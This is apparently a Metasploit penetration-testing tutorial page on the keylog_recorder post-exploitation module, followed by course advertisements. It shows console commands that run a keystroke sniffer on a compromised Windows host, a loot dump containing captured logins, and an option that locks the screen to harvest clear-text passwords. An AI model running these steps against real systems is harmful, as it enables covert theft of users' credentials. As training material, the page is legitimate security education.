keylog_recorder

The keylog_recorder post module captures keystrokes on the compromised system. Note that you will want to ensure that you have migrated to an interactive process prior to capturing keystrokes.

meterpreter >
Background session 1? [y/N] y
msf > use post/windows/capture/keylog_recorder
msf post(keylog_recorder) > info

       Name: Windows Capture Keystroke Recorder
     Module: post/windows/capture/keylog_recorder
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Carlos Perez 
  Josh Hale 

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  CAPTURE_TYPE  explorer         no        Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
  INTERVAL      5                no        Time interval to save keystrokes in seconds
  LOCKSCREEN    false            no        Lock system screen.
  MIGRATE       false            no        Perform Migration.
  PID                            no        Process ID to migrate to
  SESSION                        yes       The session to run this module on.

Description:
  This module can be used to capture keystrokes. To capture keystrokes
  when the session is running as SYSTEM, the MIGRATE option must be
  enabled and the CAPTURE_TYPE option should be set to one of
  Explorer, Winlogon, or a specific PID. To capture the keystrokes of
  the interactive user, the Explorer option should be used with
  MIGRATE enabled. Keep in mind that this will demote this session to
  the user's privileges, so it makes sense to create a separate
  session for this task. The Winlogon option will capture the username
  and password entered into the logon and unlock dialog. The
  LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to
  for the user to enter their clear-text password. It is recommended
  to run this module as a job, otherwise it will tie up your framework
  user interface.

msf post(keylog_recorder) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...
meterpreter >

After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.

root@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root  s3cr3t
ftp ftp.micro
soft.com  anonymous  anon@ano
n.com  e  quit  
root@kali:~#
Menu
X Close

 

Certified Pentesting
Professional

OSCP
course starting at
$800 USD

Take Penetration Testing with Kali Linux to gain invaluable penetration testing skills and earn your OSCP.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSCP

Certified Pentesting
Expert

OSCE
course starting at
$1200 USD

Take Cracking the Perimeter to take your penetration testing skills to expert levels and earn your OSCE.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSCE

 

Certified Pentesting
Web Expert

OSWE
course starting at
$1400 USD

Take Advanced Web Attacks and Exploitation, to deep dive into web apps to earn your OSWE.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSWE

Certified Pentesting
Wireless Professional

OSWP
course starting at
$450 USD

Take Offensive Security Wireless Attacks to acquire knowledge about Wi-Fi attacks and earn your OSWP.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSWP

Certified Exploitation
Expert

OSEE
course starting at
See
Live Schedule

Take Advanced Windows Exploitation to develop exploits for Windows systems and earn your OSEE.

  • Live training course
  • Includes certification exam fee
  • Maximum instructor interaction
  • Highly challenging
  • Become an OSEE